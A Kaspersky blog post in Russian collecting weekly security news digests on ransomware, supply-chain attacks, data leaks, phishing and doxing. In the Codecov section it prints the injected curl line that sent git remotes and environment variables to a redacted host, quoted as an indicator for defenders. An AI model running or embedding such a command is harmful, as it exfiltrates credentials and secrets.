Блог компании «лаборатория касперского»

На прошлой неделе стало известно сразу о двух громких инцидентах в области кибербезопасности. Представители компании CD Projekt Red, разработавшей игры Ведьмак и Cyberpunk 2077, сообщили об успешной атаке на собственную инфраструктуру (см. также обсуждение на Хабре здесь и здесь). Злоумышленники скопировали и зашифровали данные на серверах компании. Второе проблемой для компании не является (есть бэкап), а вот первое может привести к разнообразным последствиям в плане репутации и дальнейшей эксплуатации уязвимостей в играх. Напомним, неделей ранее разработчики выпустили патч для Cyberpunk 2077, закрывающий возможность выполнения произвольного кода. Тем не менее разработчик решил не идти на поводу у киберпреступников и сообщил об атаке публично, выложив даже требование о выкупе.



После атаки компания сообщила, что данные сотрудников, скорее всего, не пострадали. Предположительно CD Projekt стала жертвой вредоносной кампании HelloKitty, ранее задевшей поставщика электроэнергии в Бразилии (здесь предыдущие атаки анализируются подробнее). Как сообщает BleepingComputer, утекшие данные уже выставили на аукцион со стартовой ценой в миллион долларов. Открытость разработчика игр по поводу инцидента можно только приветствовать. Нельзя не отметить некоторую иронию в том, как антураж Cyberpunk 2077 просочился в реальность.

Вторым громким событием стала атака на водоочистные сооружения в городе Олдсмар в штате Флорида, США. Шериф округа Пинеллас Боб Гуалтьери (Bob Gualtieri) сообщил о кибератаке на критическую инфраструктуру в ходе пресс-конференции 8 февраля. Злоумышленники воспользовались штатными средствами удаленного доступа и, что самое неприятное, пытались увеличить подачу гидроксида натрия в сто раз.



Инцидент широко обсуждался в основном в контексте опасного использования средств удаленного доступа (в описанном случае TeamViewer) для управления критической инфраструктурой. Вскрылись утечки паролей корпоративных адресов в городских коммунальных службах (см. твит выше). Даже без них прямое управление компьютерами на водоочистной станции без дополнительных средств защиты плохая идея. Брайан Кребс приводит в своей статье свидетельства, что такая практика распространена в целом по стране. И еще аргумент: если уволить всех администраторов, хоть раз открывавших удаленный доступ к рабочему столу, скорее всего, промышленными системами будет некому управлять. Использование TeamViewer указывает на недофинансирование и сигнализирует о необходимости комплексного повышения безопасности критической инфраструктуры.



Из-за этих громких новостей в тени осталось интересное исследование Алекса Бирсана (Alex Birsan) о методе внедрения вредоносного кода при сборке ПО, использующего публичные репозитории, такие как npm, PyPi и RubyGems. Ранее эту проблему исследовали на предмет загрузки в репозиторий кода с опечаткой в названии при этом появляется возможность внедрить произвольные функции, если разработчик софта ошибется в названии подключаемой библиотеки. Но это не единственный способ. В статье приводится интересная схема возможных сценариев атаки:



Бирсан нашел еще один. Анализируя код для платежной системы PayPal, выложенный на GitHub, он обнаружил упоминания приватных библиотек, очевидно, доступных только для разработчиков компании. Далее он проверил, что будет, если выложить пакет с таким же именем в публичный репозиторий. Как выяснилось, публичный пакет получает приоритет перед приватным. Затем исследователь провел полевое испытание: находил приватные библиотеки, а затем выкладывал свой код в общее хранилище под тем же именем. В коде содержался простой триггер, сообщающий об успешной атаке автору.



Результаты впечатляют. Автору удалось взломать код (по сути, выполнить свою программу в локальной сети) компаний Shopify, Apple, PayPal, Netflix, Yelp и Uber. Ряд компаний выплатили Алексу значительное вознаграждение, соответствующее опасности такого взлома в реальных условиях. Специалисты из Microsoft Azure предлагают несколько решений для описанной проблемы.

Что еще произошло:
Интересное исследование безопасности видеокамер, предназначенных для установки в яслях и детских садах. Доступ к устройствам выдается родителям через приложение для смартфона, но, как выяснилось, внутри все клиенты подключаются через общую пару логин-пароль, которая никогда не меняется. Кроме того, соединение осуществляется по протоколу HTTP.

Разработчики Microsoft закрывают баг, внесенный в февральском наборе патчей: он вызывает синий экран при попытке подключения к точке доступа с авторизацией по протоколу WPA3. В этом же наборе патчей закрыты три серьезные уязвимости в реализации протокола TCP/IP.

Отчет компании Google о фишинге дает интересную статистику по почтовому сервису компании: каждый день блокируются сто миллионов опасных сообщений. В прошлом году аналитики Gmail фиксировали в день до 18 миллионов фишинговых сообщений, эксплуатирующих тему COVID-19. Средний срок жизни вредоносной кампании трое суток.

Компания Adobe закрывает критические уязвимости в Acrobat и Reader.



Интересный факт из жизни администраторов Википедии приведен в треде выше. В одном из датацентров до 20% запросов приходятся на фотографию цветка. Как выяснилось, изображение подгружается при запуске популярного в Индии мобильного приложения. Мало того, что это в принципе не идеальный подход к созданию ПО, так картинка еще и не демонстрируется пользователю, то есть загружается зря.

На прошлой неделе аналитики Лаборатории Касперского выпустили итоговый отчет по спаму и фишингу за 2020 год. В нем приводятся как абсолютные цифры по срабатыванию систем защиты от фишинга и детектированию вредоносных вложений, так и описание новых методов киберпреступников. Интерес представляет мутация традиционного нигерийского спама. В ответ на пандемию в сообщениях о якобы смерти богатого родственника и миллионном наследстве появились отсылки к COVID-19. Но не только: судя по всему, на этот длящийся десятилетиями скам почти никто не реагирует, и появляются более сложные методы.



Вместо прямого предложения поучаствовать в дележке несуществующих богатств жертва получает просьбу отправить открытку маленькой девочке. Мошенничество происходит где-то глубоко в процессе переписки: такое ощущение, что спамеры узнали, что такое воронка продаж. Специалисты также отмечают диверсификацию вредоносных действий, ориентир на мобильных пользователей и мессенджеры. В одном случае мошенники предлагают не только поучаствовать в розыгрыше ценных призов, но и сообщить о псевдолотерее друзьям и знакомым. В другом для получения коронавирусной компенсации требуют установить вредоносное приложение на смартфон. Как обычно, наиболее продвинутое мошенничество замечено в потенциально более прибыльных атаках на корпоративную инфраструктуру.



Спамеры делают все возможное, чтобы создать правдоподобные копии реальной облачной инфраструктуры, начиная с подделок под веб-интерфейс корпоративной почты и заканчивая сервисами по передаче файлов, как на скриншоте выше. Среди других похожих на нормальные каналы в отчете приводятся голосовые сообщения, инвайты на встречу в Zoom и других сервисах телеконференций, уведомления от IT-отдела, симуляции автоответов с вредоносными вложениями. Наконец, есть пример креативной атаки на владельцев веб-сайтов: через форму обратной связи им приходит письмо с обвинением в краже рисунка или фотографии и ссылками-доказательствами (естественно, вредоносными). Высший пилотаж: мошенничество без вредоносных ссылок, когда пользователя просят позвонить в техподдержку.

Если коротко, в прошлом году обычная спам-вакханалия получила оттенок COVID-истерии. Самое интересное, что это произошло на фоне снижения доли спама в общем почтовом трафике: в 2020-м она составила 50,37%, что на 6,14 процентных пункта ниже, чем в 2019 году. Скорее всего, это не спамеры стали хуже работать, а количество легитимных писем увеличилось в связи с массовым переходом на удаленную работу.

Произошли некоторые изменения в спам-географии: чаще всего мусорные письма отправляли в прошлом году из России (21,27% всех нежелательных сообщений), на втором месте оказалась Германия. В прошлом году лидерами по отправке спама были серверы, расположенные в США и Китае. Тройка лидеров получателей спама: Испания, Германия и Россия.

Фишинговые ссылки были заблокированы у 13,21% пользователей продуктов Лаборатории Касперского. Это среднее значение по миру, но в некоторых странах доля срабатываний выше: например, в Бразилии фишинг не дошел до 20% пользователей. В целом авторы отчета отмечают рост количества таргетированных атак через электронную почту, ориентированных на компании. Мы, получатели спама, представляем большую ценность, когда работаем, а не когда сидим дома. Правда, в 2020 году эти два состояния почти не отличались друг от друга.

Что еще произошло:
Компания Microsoft принудительно удаляет Adobe Flash с компьютеров пользователей с помощью обновления Windows 10.



Патч для браузера Brave закрывает серьезную дыру в приватности: оказывается, до этого все запросы к доменам .onion через встроенный Tor-браузер утекали к провайдеру DNS-серверов.

Обнаружен первый (а затем и второй) образец вредоносного ПО для компьютеров Apple на базе процессора M1.

Инфраструктуру сервиса Letsencrypt серьезно переработали. Теперь она позволяет перевыпустить все сертификаты в течение суток. Это сделано на случай необходимости отзыва сертификатов из-за программных ошибок.

Аналитики Microsoft выпустили отчет об атаке SolarWinds на инфраструктуру компании. По их данным, организаторы смогли получить доступ к исходным кодам некоторых решений (в частности, Azure и Exchange). Доказательств, что инфраструктуру Microsoft использовали для атаки на клиентов, не обнаружилось.

На прошлой неделе получил развитие вялотекущий скандал вокруг Footfallcam, британского производителя специализированных веб-камер. Издание The Register в своем материале приводит предысторию: все началось с сообщений нидерландского исследователя OverSoftNL, в которых он еще в начале февраля описал серьезные проблемы с безопасностью устройств этой компании.



Как выяснил эксперт, камера Footfallcam, предназначенная для подсчета проходящих мимо людей, построена на плате Raspberry Pi. Анализ прошивки показал не только забытые разработчиком отладочные файлы (и один музыкальный трек), но и фиксированный пароль доступа к Wi-Fi-сети стандартного пользователя ОС Raspbian с паролем по умолчанию, а также включенный доступ по протоколу SSH. Иными словами, после добавления в корпоративную сеть устройство представляло собой огромную дыру в безопасности. Но это был не единственный продукт производителя со странным подходом к защите.

Драма началась в процессе приватного общения исследователя c производителем. Представители Footfallcam запросили у OverSoftNL и его компании услуги пентестинга, но после предварительной оценки стоимости исследователя публично обвинили в вымогательстве и пообещали заявить в полицию. Здесь к истории подключился другой исследователь, Эндрю Тирни (Andrew Tierney), который 14 февраля опубликовал обзор проблем в другом устройстве того же производителя. На этот раз речь шла о камерах Nurserycam. Их устанавливают в детских садах, а родителям предлагается скачать приложение, через которое они могут получить доступ к видео в потоковом режиме.

Утилита накладывает ряд ограничений на доступ, чтобы его могли получить только родители и только в определенное время. Как выяснилось, Nurserycam не только общается с приложением по незащищенному протоколу HTTP, но авторизованным родителям для доступа к веб-камере выдается пароль администратора, который не меняется. Хотя пароли напрямую не демонстрировались в приложении, их было легко вытащить из потока данных. Производитель веб-камер и в этом случае пытался проигнорировать актуальные проблемы, назвав админский доступ приманкой для хакеров. Одновременно произошли некоторые изменения в API для работы с камерами, которые, впрочем, ничего не исправили.

Финальным аккордом истории стала утечка пользовательских данных, предположительно произошедшая в результате взлома серверов компании. О ней стало известно 22 февраля: в открытый доступ попали сведения о 12 000 клиентов Nurserycam, включая пароли открытым текстом. Судя по анализу уязвимостей, можно говорить о многолетнем игнорировании базовых средств защиты пользовательских данных. На это также указывают свидетельства клиентов Nurserycam: несколько лет назад кто-то обнаружил, что прямой доступ к любым видеопотокам можно получить, перебирая цифры в URL, а архив записей какое-то время лежал на FTP без пароля.

Помимо прочего, эта история пример отвратительной коммуникации между специалистами по безопасности и вендором. Информацию об уязвимостях выложили в открытый доступ до того, как производитель смог на нее отреагировать. Но и он сделал все возможное для такого исхода, вместо конструктивного общения рассылая угрозы и атакуя исследователей публично с фейковых аккаунтов в Twitter. Все, что могло пойти не так, пошло не так.

Что еще произошло

Эксперты вновь сообщают об опасности навыков (по сути, стороннего софта) для умных колонок Amazon Alexa (новость, исследование). Ряд прорех в защите позволяет в теории использовать навыки для фишинговых атак на пользователей и прочего. Представители Amazon (впрочем, как и в других подобных случаях) отрицают возможность вредоносных атак на умные голосовые устройства.

Специалисты Лаборатории Касперского опубликовали свежее исследование о деятельности группировки Lazarus, частично связанное с недавней атакой на исследователей по безопасности.

В другом отчете Лаборатории Касперского освещают эволюцию сталкерского ПО для неправомерной слежки за людьми.

В Индии обнаружена масштабная утечка данных о прошедших тест на коронавирус.

В свитчах Cisco Nexus 3000 и Nexus 9000 нашли (и закрыли) критическую уязвимость, которую оценили на 9,8 балла по шкале CvSS, она давала возможность удаленно получить root-права.

Хранение данных в изначально не приспособленных для этого форматах часто обсуждают в сфере инфобезопасности. Как правило, стеганографию используют для скрытной передачи информации: например, зараженная система связывается с командным сервером и передает на первый взгляд безобидные изображения.

На прошлой неделе очередное упражнение на эту тему произошло в лагере white-hat: исследователь Дэвид Бьюкенан (David Buchanan) нашел способ обмениваться файлами через картинки в твиттере (новость, страница на GitHub с описанием и кодом).



Никакой уязвимости тут нет: вставлять данные в PNG-изображение можно разными способами, а в данном случае даже не требуется специальный инструмент для декодирования. Достаточно переименовать .png-файл в .zip и распаковать данные из получившегося архива.

Автор этого трюка нашел особенность обработчика изображений в Twitter, который удаляет часть избыточных данных из файла, но не трогает одну из областей IDAT, где и спрятана лишняя информация. У метода есть ограничения: если итоговый файл весит больше 3 Мбайт, Twitter сконвертирует изображение в JPEG. Демонстрация метода доступна в твиттере автора, а изображение оттуда приведено выше: на Хабре трюк тоже работает (на момент публикации). Внутри ZIP-файла-картинки спрятан код на Python, позволяющий прятать в PNG произвольные данные.

Еще одна демонстрация с файлом потолще: Дэвид не удержался и устроил рикролл в отдельно взятой картинке. Помимо твиттера и Хабра, аналогичный способ действует на хостинге картинок Imgur и в репозитории GitHub, но не работает, например, на Reddit.

Что еще произошло:
Большая новость недели: обнародованные ранее уязвимости в высокопроизводительных сетевых устройствах F5 BIG-IP и BIG-IQ активно эксплуатируют, эксплойт для обхода систем аутентификации лежит в открытом доступе.



Продолжается оценка ущерба от уязвимостей в Microsoft Exchange Server, в том числе за пределами США. Бельгийский центр реагирования на киберугрозы сообщает о 400 пострадавших (читай, взломанных) почтовых серверах. На сайте Microsoft опубликованы подробные рекомендации для системных администраторов по лечению атакованных серверов. Также вышел набор обычных апдейтов для Exchange Server, в том числе решающий проблемы, которые могли возникнуть после аварийного патча.

Еще один патч от Microsoft призван закрыть все проблемы с печатью в Windows 10, вызванные неудачными обновлениями, выпущенными ранее.

Производителя компьютеров Acer предположительно успешно атаковал шифровальщик. По данным BleepingComputer, с компании требуют 50 миллионов долларов.

В Facebook собрали свою команду ИБ-исследователей, аналог Google Project Zero и других проектов.

Исследования экспертов Лаборатории Касперского: анализ рекламного ПО для macOS с кодом на Rust и разбор вредоносного кода с поддержкой архитектуры Apple M1.

Обнаружена уязвимость в WordPress-плагине TutorLMS, грозящая кражей данных и повышением привилегий.



Компания Netflix вводит правило, согласно которому одновременное использование аккаунта в разных локациях должно быть подтверждено владельцем. Стриминговый сервис борется не столько с обычными пользователями, которые передают пароль друзьям, сколько с черным рынком учеток.

На прошлой неделе эксперты Лаборатории Касперского опубликовали аналитический обзор основных приемов корпоративного доксинга. Под доксингом в целом, как правило, понимают сбор приватной информации о частных лицах для последующего распространения. В случае с компаниями речь, скорее, идет об этапе сбора данных перед проведением атаки. Например, чтобы заставить бухгалтерию предприятия перевести крупную сумму, нужно быть достаточно убедительным в почтовой переписке или телефонных переговорах. Для этого требуется рекогносцировка.



Как собирают данные? В первую очередь, их добывают из открытых источников, начиная со списка сотрудников на сайте компании. Много информации приносят социальные сети: по связям между аккаунтами сотрудников в LinkedIn можно без проблем воссоздать внутреннюю организационную структуру, понять, кто кому подчиняется.

Следующий уровень различные виды атак типа Business E-mail Compromise. Любопытный пример атаки начинается с реального поста сотрудника в соцсети о том, что он находится в отпуске. Далее злоумышленники от его имени связываются с бухгалтерией и просят сменить банковские реквизиты для перевода зарплаты. Невозможность связаться по телефону для подтверждения запроса объясняется пребыванием в другой стране.

Выше уровнем по сложности располагаются атаки с использованием утекшей в Сеть корпоративной информации. Например, внутренние документы компании могут оказаться в открытом доступе в облачной системе. Даже если они сами по себе не позволяют украсть средства, информацию можно использовать для социального инжиниринга.

Самый необычный пример почтовой атаки в обзоре использование трекингового пикселя. Работает это так: сотрудник компании из высшего менеджмента получает вроде бы бессмысленные электронные сообщения, иногда маскирующиеся под тестовую рассылку. Просматривает и удаляет их, но вставленное в тело письма трекинговое изображение передает злоумышленникам массу данных: IP, с которого происходит подключение, а также примерные часы работы сотрудника. Используя эти данные, можно повысить достоверность мошеннических сообщений, требующих срочно связаться с внешним консультантом или немедленно перевести средства на определенный банковский счет.


Фишинг в сводке разделен на две категории: обычный и телефонный. С обычным все понятно, пример приведен выше. В таких сообщениях, как правило, пользователя просят пройти по ссылке и ввести пароль от корпоративного сервиса. Пример голосового фишинга: присылаем сотруднику e-mail с сообщением якобы о блокировке аккаунта. Через некоторое время поступает телефонный звонок якобы от сотрудника техподдержки на ту же тему. В качестве успешного примера мимикрии под саппорт приводится атака на соцсеть Twitter летом 2020 года, когда злоумышленники получили доступ к внутренней админской консоли.


Заключительная часть обзора описывает совсем уж нестандартные типы корпоративного доксинга. Например, взлом учетной записи в соцсети конкретного сотрудника, без атак на корпоративную инфраструктуру. Если сотрудник высокопоставленный, заявления от его имени в частном аккаунте могут повлиять на курс акций компании и принести прибыль атакующим. Наконец, будущее корпоративного мошенничества синтез голоса высших менеджеров компании для кражи средств, нанесения ущерба репутации и прочего. Единичные успешные атаки получили развитие в соцсети Clubhouse, где неоднократно были замечены фейковые голосовые трансляции от лица известных персон.

Что еще произошло

Уязвимость в Microsoft Exchange закрывают невероятно быстрыми темпами. В отчете Microsoft за 22 марта утверждается, что 92% уязвимых почтовых серверов уже пропатчили. Это очень быстро по сравнению со скоростью закрытия любой другой уязвимости, но недостаточно, если помнить об особенностях дыры, дающей полный контроль над сервером. Из странных атак на серверы, которые не обновили, или обновили, но не закрыли уже имеющийся бэкдор, на прошлой неделе отметился взлом серверов якобы от имени журналиста Брайана Кребса.

Выпущенное 26 марта обновление iOS, iPadOS и watchOS закрывает активно эксплуатируемую уязвимость в движке WebKit, которая позволяет проводить XSS-атаки.

Проведенный организацией CitizenLab анализ исходного кода приложения TikTok не выявил каких-либо нарушений приватности. Тут требуется оговорка: эксперты не нашли функций за пределами типичных для такого рода разработок, но данных о пользователях в рекламных целях все равно собирается много.

Издание ZDNet пишет про реальную атаку типа BadUSB. Компания, занятая в гостиничном бизнесе, получила по почте флешку якобы бесплатный бонус от крупной торговой сети. На самом деле флешка эмулировала клавиатуру, что открывало возможность для загрузки и установки вредоносного кода.

В субботу 3 апреля в публичный доступ попала огромная база данных пользователей соцсети Facebook. На одном из киберкриминальных форумов появились записи о 533 миллионах пользователей из 106 стран, среди них чуть меньше 10 миллионов учеток из России.

В ответ на запрос СМИ в Facebook подтвердили факт утечки. Дело было так: еще в 2019 году кто-то воспользовался уязвимостью в инструменте для поиска друзей, который сам по себе вызывает сомнения с точки зрения приватности. Данная фича заливала на серверы соцсети телефонную книгу пользователя и предлагала ему добавить в друзья найденных людей. Как выяснилось позднее, инструмент позволял перебором пройтись по всему массиву телефонных номеров и выгрузить данные о большом количестве пользователей примерно 20% от общего числа учеток в соцсети.


В том же 2019 году похожую проблему нашли в Telegram: перебор телефонных номеров помогал выяснить никнейм пользователя, а через базу данных сотовых операторов связать учетную запись в мессенджере с реальным человеком.

По понятным причинам из Facebook не утекли пароли, но персональных данных в общий доступ попало много: имена, локация, данные о работодателе, пол, дата регистрации. База из 2019-го, судя по всему, какое-то время продавалась на черном рынке, а в январе этого года в Telegram появился бот, продающий данные по телефонному номеру. Электронных адресов, ассоциированных с аккаунтами, утекло относительно мало: Трой Хант (Troy Hunt) добавил в базу сервиса Haveibeenpwned всего 2,5 миллиона записей.

Сама по себе утечка вряд ли добавляет новые риски для отдельного пользователя. Уже давно можно применять к соцсетям простое правило: если вы передаете им какие-то данные, считайте их публичными, даже если применены какие-то настройки приватности.

Эта история вновь поднимает тему безопасности телефонного номера это ключевой способ идентификации личности. Сменить номер еще сложнее, чем почтовый адрес, его потеря чревата прямым финансовым ущербом, а способов перехватить данные, передающиеся через SMS, достаточно много. Легко представить схему атаки, в которой злоумышленники определяют номер пользователя после утечки подобных баз данных, а затем через социальный инжиниринг или прямую подмену SIM-карты получают доступ к банковскому счету. Что с этим делать понятно, хотя эти действия вызывают дополнительные сложности. Например, перейти на другие средства двухфакторной аутентификации или использовать разные номера для регистрации на публичных сервисах и для доступа к банковским услугам. Как обычно, проколы сторонних сервисов, вольно обращающихся с данными пользователей, приносят проблемы самим пользователям.

Что еще произошло

В сетевых устройствах компании QNAP обнаружили две критические уязвимости: обход авторизации и запись произвольных данных. Свежая прошивка исправляет как минимум одну из них.

Специалисты GitHub расследуют нестандартную уязвимость в собственной инфраструктуре. Злоумышленники воспользовались инструментом GitHub Actions, который позволяет автоматизировать действия при работе с исходным кодом. Возможности оказались слишком широкими вплоть до запуска криптомайнеров непосредственно на серверах компании.

Локеры, компьютерная напасть как минимум десятилетней давности, стали менее распространены с развитием троянов-шифровальщиков. В свежем исследовании эксперты Лаборатории Касперского напоминают, что вредоносные программы, требующие выкуп за разблокировку компьютера, никуда не делись. В статье рассматриваются блокировщики, работающие строго в веб-браузере.

Другое исследование Лаборатории Касперского описывает таргетированную атаку, эксплуатирующую, помимо прочего, уязвимости в VPN-клиенте Pulse Secure.

Подробное описание уязвимости типа zero-click (то есть не требующей каких-либо действий от пользователя) в почтовом клиенте Apple Mail. Уязвимость позволяет менять настройки клиента, например модифицировать подпись. Проблему закрыли в июле прошлого года.


В феврале мы писали про кибератаку на исследователей по безопасности: их компьютеры пытались взломать с помощью поддельного сайта с описанием уязвимостей. В компании Google сообщают о рецидиве: исследователей заманивали на сайт, якобы принадлежащий турецкому пентестинг-сервису, содержащий эксплойт для браузера. Для более эффективного заманивания в соцсетях создавали правдоподобные профили сотрудников поддельной организации.


Владельцы публичного репозитория исходников языка PHP в конце марта сообщили о попытке внедрить туда вредоносный код. См. также обсуждение на Хабре.

В свежем исследовании проанализировали (новость, PDF) телеметрию, собираемую с устройств на базе iOS и Android. Выводы авторов: данные и там, и там передаются в среднем каждые 4,5 минуты. ОС Google передает в 20 раз больше данных, чем iOS. Последнее утверждение оспорили разработчики Android: дело не в том, что они собирают меньше данных, а в том, что не всю телеметрию мобильной ОС Apple удалось посчитать.

В npm-пакете Netmask обнаружили серьезную ошибку при обработке IP-адресов, если в начале адреса есть ноль. В самом простом примере адрес 0127.0.0.1 можно преобразовать в 87.0.0.1.

Сообщения о масштабных утечках пользовательских данных часто следуют друг за другом, и иногда это не просто совпадение. После того, как в открытый доступ попала база данных пользователей Facebook, у кого-то явно появилось желание посмотреть, что еще можно найти на полупубличных хакерских форумах. В результате 6 и 10 апреля один и тот же источник сообщил о новых масштабных утечках: сначала про 500 миллионов пользовательских записей LinkedIn, потом об утечке данных из голосовой соцсети Clubhouse.


Проблема в том, что это не совсем утечки. Обе базы содержат только публично доступную информацию о пользователях. Никакого взлома не произошло, о чем и сообщили пострадавшие (исключительно от негативного пиара) организации (заявление Clubhouse, заявление LinkedIn). Кто-то даже предложил записать в хакеры поисковые системы те на регулярной основе добывают и хранят на своих серверах такие же базы, а потом сливают их кому попало. Этим две новости прошлой недели отличаются от инцидента в Facebook. В том случае утекла все же приватная информация (например, номер телефона Марка Цукерберга), еще и собранная через сомнительную практику, в рамках которой соцсеть получает телефонную книгу пользователя.

В результате всю неделю шло обсуждение терминологии: что вообще можно считать утечкой данных? В частности, Трой Хант, владелец ресурса Haveibeenpwned, публичную базу данных пользователей Clubhouse утечкой не считает:


При этом он же добавил в свой сервис базу данных Facebook. Для этого понадобилось ввести проверку не только по e-mail, но и по номеру телефона, так как почтовых адресов две недели назад утекло относительно немного (2,5 из 500 миллионов). Обсуждение было подогрето заявлением Facebook о том, что соцсеть не будет уведомлять пользователей, чьи данные стали публичными.

Руководство сервиса можно понять: одно дело, когда инцидент обсуждается в тусовке айтишников, другое когда о нем знает полмиллиарда пользователей. Есть и более весомый аргумент. Да, получив доступ к базе данных, кто-то может узнать номер вашего телефона, адрес, место работы и другую информацию, даже если вы скрыли ее в профиле. Но в базе данных нет паролей. Нет прямой угрозы взлома аккаунта, только косвенная опасность, что данные будут использованы против вас, ваших учеток в каких-либо сервисах, вашего банковского счета.

Допустим, ваши данные есть в утечке что делать? Пароль менять не обязательно. Перевыпустить кредитку? Сменить имя и фамилию? Номер телефона? Найти другую работу? Переехать? Пожалуй, единственное, что пользователь соцсетей в состоянии сделать в такой ситуации это не передавать сетевым сервисам актуальную персональную информацию. Но даже этого добиться непросто: в некоторых сложных случаях тот же Facebook требует не только номер телефона, но и скан удостоверения личности. Вообще не пользоваться соцсетями? Да, но есть свидетельства о наличии в базе Facebook данных давно удаленных аккаунтов, и даже информации о людях, которые вообще никогда не пользовались соцсетью.

Что еще произошло

В блоге Лаборатории Касперского опубликовали подробную историю кибервымогательства, вплоть до первой подобной атаки еще в 1989 году.

Приложение APKPure, позволяющее устанавливать на смартфоны под управлением Android приложения в обход официального магазина Google Play, некоторое время распространялось с довеском в виде трояна. Скорее всего, приложение скомпрометировали через рекламный SDK.


Аналитики Microsoft исследуют вредоносную кампанию, идущую через формы обратной связи на веб-сайтах. Организаторы атаки рассылали через них требования удалить нелицензированные фотографии от имени разъяренных владельцев авторских прав.

Компания Sophos вводит смешной термин beg bounty. В статье описываются примеры, когда простое сканирование веб-сайтов или почтовых серверов обнаруживало тривиальные уязвимости (или даже просто не идеальные настройки, например отсутствие DMARC). После этого первооткрыватели требуют от владельцев сервера денег или подарков, или ну хоть что-нибудь.

Серверы обновления ПО Gigaset (бренда производителя смартфонов, выжившего после многочисленных перепродаж мобильных торговых марок Siemens/BenQ), взломали, с них какое-то время распространялись вредоносные приложения.

Портал HackerNews сообщает о рассылке вредоносных файлов в LinkedIn под видом предложений о работе.


Трой Хант получил контроль над доменом сервиса Coinhive. До закрытия в 2019 году Coinhive предлагал веб-мастерам крайне сомнительный способ заработка: цифровая валюта Monero майнилась на компьютерах посетителей веб-сайта, если вставить на него код сервиса. Естественно, закрытие сервиса не убрало код с десятков тысяч сайтов, владельцы которых могут и не подозревать о его наличии. Хант упростил им обнаружение проблемы: запрос от скрипта Coinhive теперь приводит к появлению огромного баннера поверх контента.

В четверг 15 апреля компания Codecov опубликовала сообщение о взломе собственной инфраструктуры и потенциальной утечке данных у клиентов. Главный продукт Codecov предназначен для разработчиков ПО и позволяет улучшать покрытие кода тестами. Пострадала утилита Bash Uploader, предназначенная для отправки отчетов на серверы Codecov.



В сообщении компании пока нет всех технических деталей взлома, но известно, что атакующие воспользовались уязвимостью в процессе создания образов Docker и через нее смогли модифицировать скрипт Bash Uploader. В свою очередь, зараженный код был доставлен к потребителям, за исключением тех, кто использует особую версию продукта без облачных функций. Модификация кода впервые произошла еще 31 января. Как минимум 2,5 месяца с серверов Codecov распространялся, по сути, вредоносный скрипт. Ключи доступа к облачным средствам разработки пострадавших клиентов с высокой вероятностью утекли.

Клиентам Codecov рекомендовано проверить установленную версию скрипта на наличие следующей строки:

curl -sm 0.5 -d $(git remote -v)<<<<<< ENV $(env) http://REDACTED/upload/v2 || true

Последствия взлома пока трудно оценить: данный инцидент можно квалифицировать как атаку на цепочку поставок в квадрате. Взломано решение для разработчиков ПО, а значит есть шанс, что код клиентов Codecov также мог быть модифицирован. В числе потенциальных пострадавших крупные компании, включая Atlassian, P&G и GoDaddy. Кроме того, код Bash Uploader открыт, распространяется по свободной лицензии и включен в другие проекты для разработчиков ПО.


В Codecov продолжают расследование, чтобы выяснить все детали того, как ключи доступа к исходному коду попали в руки злоумышленников. Помимо этого, компания обещает внедрить средства мониторинга, чтобы исключить неавторизованную модификацию кода в будущем. Судя по всему, клиентам компании также придется провести похожий аудит.

Что еще произошло

Команда Google Project Zero обновляет правила раскрытия информации об ошибках. Теперь при обнаружении серьезной уязвимости вендору будут давать не только 90 дней на поиск решения, но, в некоторых случаях, еще 30 суток сверху на распространение патча. Но в следующем году Project Zero планирует уменьшить 90-дневное окно для разработки патча. А еще на прошлой неделе в нарушение всех этических норм обнародовали эксплойт для непропатченной уязвимости в Google Chrome.


Нидерландская транспортная компания Bakker Logistiek стала жертвой вымогательства с шифрованием данных. IT-система компании на некоторое время вышла из строя, а побочным уроном стал дефицит сыра в местной сети супермаркетов.

Министерство юстиции США сообщило о принудительном удалении веб-шеллов с взломанных почтовых серверов Microsoft Exchange, без ведома владельцев.


Между тем в апрельском наборе патчей Microsoft закрыли еще четыре уязвимости в Exchange. Но их, по словам вендора, не эксплуатировали до выпуска заплаток. Обзор всех важных патчей есть на Bleeping Computer.

Еще один патч из набора Microsoft закрывает уязвимость нулевого дня в Desktop Window Manager, обнаруженную специалистами Лаборатории Касперского.

Журналисты The Register пишут про исследование пиратских копий Microsoft Office и Adobe Photoshop. Никого не удивит результат: в пиратках нашли вредоносные программы, занятые в основном угоном пользовательских данных. Единственная относительно новая тема кража криптовалюты Monero.

Интереcная новость прошлой недели исследование создателя защищенного мессенджера Signal Мокси Марлинспайка (Moxie Marlinspike), посвященное инструменту для скачивания данных со смартфонов компании Cellebrite. Данный инструмент состоит из железа для подключения к различным смартфонам, другим мобильным устройствам и софта под Windows. Взломом в классическом понимании этот комплекс не занимается: Мокси сравнивает его работу с действиями сотрудника полиции, который берет ваш разлоченный телефон и переписывает все сообщения из мессенджеров. Естественно, комплекс эту задачу автоматизирует.


Cellebrite и Signal, таким образом, находятся по разные стороны идеологического фронта. Решение Cellebrite используется правоохранительными органами в разных странах для получения доступа к данным, которые пользователь хотел бы сохранить в тайне, в том числе к переписке в Signal. Цель Signal сделать так, чтобы переписка в чате не была доступна никому, кроме абонентов. Самое уязвимое звено в этой коммуникации смартфон пользователя: если получить доступ к разлоченному девайсу, можно увидеть всю переписку. Создатель Signal неведомыми путями получил доступ к устройству Cellebrite и нашел уязвимости в его софте.

Как удалось добыть устройство, Мокси не объясняет, точнее, объясняет туманно: шел по улице, а тут на тебе, лежит на асфальте полный комплект для анализа мобильников. Естественно, производители таких штук предоставляют доступ к своей технике только проверенным организациям, и Signal в их число не входит. Исследователь проанализовал софт, который, исходя из задачи, включает множество парсеров данных из разных приложений. Такие обработчики во всех случаях являются рассадником уязвимостей, а в качестве примера приводится набор кодеков ffmpeg. Эти библиотеки используются ПО Cellebrite UFED для разбора мультимедийного контента, и Мокси обнаружил устаревший релиз 2012 года. С тех пор для ffmpeg было выпущено более сотни патчей, устраняющих проблемы с безопасностью.

В результате без особого труда Мокси нашел уязвимость, которая приводит к следующему: если комплекс Cellebrite читает на телефоне подготовленный файл, появляется возможность подменить данные в генерируемом отчете. И даже изменить предыдущие отчеты или гарантировать изменение будущих репортов. Это толстый намек на то, что Мокси смог получить полный контроль над софтом через уязвимость в парсере данных. В конце публикации Марлинспайк сообщает, что свежий апдейт мессенджера Signal будет содержать дополнительный файл, который абсолютно никак не влияет на функциональность. Файл совсем не интересный, рекомендуется не обращать на него внимание. То есть, возможно (хотя напрямую об этом не говорится), анализ телефона с установленным мессенджером Signal может испортить данные, генерируемые комплексом для сбора улик.

